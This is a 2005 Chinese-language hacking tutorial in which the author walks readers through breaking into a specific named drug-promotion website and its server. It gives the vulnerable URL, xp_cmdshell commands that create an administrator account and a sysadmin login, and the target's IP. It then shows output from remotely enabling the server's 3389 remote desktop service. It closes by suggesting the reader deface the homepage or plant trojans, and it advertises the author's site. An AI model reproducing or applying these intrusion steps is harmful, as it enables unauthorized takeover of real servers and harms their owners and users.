大家好~！我是misssky 这次给大家带来一个教程 是检测新药招商网（http://www.xyao.com/）是个药品推销的网站 到拿权限经过，开始还是做做本站的广告，本站地址http://www.qqreport.com(QQ快讯），最近本站流量不太好 希望大家帮帮忙呀 希望大家多多支持，（进去不要忘了点广告呀~！本人现在没钱  只能靠网站广告了  嘿嘿~！）好了  废话不说了 现在开始
需要工具
1 SQLTOOLS
2 SSPORT
3 RECTON
4 3389连接器（我用WINDOWS自带的）
5 阿D注入工具
6 Domain3.5
好了 现在开始
本人大字不太快不要介意呀
先用阿D检测这个网站http://www.xyao.com/ 有点慢呀！嘿嘿~！
看见了吗？
http://www.xyao.com/job_zp_view.asp?id=52存在漏洞
呵呵  用Domain3.5检测一下  因为我不太喜欢用阿D
恭喜,该URL可以注入!
数据库类型:MSSQL数据库 (错误提示关闭)

看见了吧  我们不扫他 直接进MSSQL辅助工具
直接添加自己为管理员 就行了
命令是
---------------------------------SQL语句---------------------
exec xp_cmdshell 'net user misssky 123456 /add'
exec xp_cmdshell 'net localGroup Administrators misssky /add'
exec master..sp_addlogin UserName,Password
exec master..sp_addsrvrolemember UserName,sysadmin
我改一下用户
命令执行完毕!看见了吧
命令执行完毕!
好了 现在我已经把这个misssky提为管理员了
现在我们用SQLTOOLS登陆
先PING 一下他的IP 他的IP是 211.157.108.112
好了  登陆上了
现在用DOS工具
给自己添加系统管理员
干什么你们后面就知道了
我已经添加过了 现在我们用SSPORT扫 看他开什么端口了吗？
我们用RECTON试试 看能不能直接用这个东西开他的3389 ，从起最好了

正在连接 211.157.108.112 ......
连接成功！
正在检查操作系统类型 ......
操作系统类型为 Microsoft Windows 2000 Server
正在写注册表 ......
正在试图重启 ......
重启成功！
Terminal服务已经成功开启！端口： 3389
呵呵 大家自己看  3389大开了  现在机子在重起呢
郁闷 不知道为什么  他没重其  不知道是不是我开过了 就不行了
在给大家做动画的时候我已经把他的3389开了看见了吧  我是通过他开135端口判断的
同过135在开他的3389 好 了不扫了

呵呵好了 他的机子在重起中  我们只有等了
用到的工具我网站上有呢

好了 现在我们登陆

大家看到了吗？
现在这个是你的  你想干什么就可以干什么 呀 可以改他的主页
也可以挂马的
呵呵
不要搞破坏呀  那样是违法的
呵呵~！
动画做完了  呵呵
有什么问题请加QQ 8928903
                                                                2005年12月28日
                              BY misssky